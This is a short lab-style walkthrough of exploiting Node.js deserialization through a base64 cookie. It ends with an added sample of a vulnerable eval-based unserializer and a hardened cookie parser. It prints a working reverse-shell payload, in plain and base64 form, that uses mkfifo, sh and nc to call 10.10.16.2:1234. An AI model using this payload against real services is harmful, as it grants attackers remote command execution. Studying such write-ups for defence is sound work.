Celestial

Short Snippet on Node JS deserialization


Last updated 8 months ago

We are presented with a Node.js application that returns dynamic content on each refresh.

Decoding the base64 cookie shows that it is a serialized Node.js object:

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"3"}

The username field looks injectable, lets try to put our reverse shell payload in it.

{"username":"_$$ND_FUNC$$_function() {require('child_process').exec('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 1234>/tmp/f', (error, stdout, stderr) => { console.log(stdout); }); } ()"}
// base64-encoded version
eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpIHtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncm0gLWYgL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTYuMiAxMjM0Pi90bXAvZicsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpID0+IHsgY29uc29sZS5sb2coc3Rkb3V0KTsgfSk7IH0gKCkifQ==

The _$$ND_FUNC$$_ prefix tells the deserializer that the string contains embedded JavaScript, and the () appended at the end turns it into an IIFE, so the function (our reverse shell) is invoked immediately when the object is deserialized, not when the property is later used.

With that, we get our shell.
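The mechanism above, as an added example that is not part of the original writeup: a simplified model of how a node-serialize style unserialize() evaluates strings flagged with _$$ND_FUNC$$_ (using a harmless IIFE instead of a shell), next to a hardened cookie parser that refuses such strings. unsafeUnserialize, safeParseCookie and demoUnsafe are assumed names, not the application's or the library's own code.

```javascript
// Added example, not from the original writeup: a minimal model of the
// node-serialize style behaviour that makes the cookie exploitable, and a
// hardened parser that treats the cookie as plain data.
const FUNC_FLAG = '_$$ND_FUNC$$_';

// Simplified reimplementation of the vulnerable step (assumption: the real
// library does more, but the core is the same): any string value starting
// with the flag is handed to eval(). If the string ends in "()", the body
// runs during deserialization itself, before the app touches the object.
function unsafeUnserialize(json) {
  const obj = JSON.parse(json);
  for (const key of Object.keys(obj)) {
    const v = obj[key];
    if (typeof v === 'string' && v.startsWith(FUNC_FLAG)) {
      obj[key] = eval('(' + v.slice(FUNC_FLAG.length) + ')');
    }
  }
  return obj;
}

// Hardened alternative: decode, JSON.parse, and reject the session if any
// string value carries the function marker. Nothing from the cookie is ever
// evaluated as code, so a flagged value cannot execute.
function safeParseCookie(b64) {
  const obj = JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
  for (const v of Object.values(obj)) {
    if (typeof v === 'string' && v.includes(FUNC_FLAG)) {
      throw new Error('rejected cookie: embedded function marker');
    }
  }
  return obj;
}

// Constructed benign demo: the IIFE runs at deserialization time and leaves
// a side effect in demoState, which is exactly what the shell payload relies on.
const demoState = { ran: false };
function demoUnsafe() {
  demoState.ran = false;
  const payload = JSON.stringify({
    username: FUNC_FLAG + 'function(){ demoState.ran = true; return "ran"; }()',
  });
  const result = unsafeUnserialize(payload);
  // Returns { ran: true, username: 'ran' }: the code executed, and the
  // property holds the IIFE's return value, not a function.
  return { ran: demoState.ran, username: result.username };
}
```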
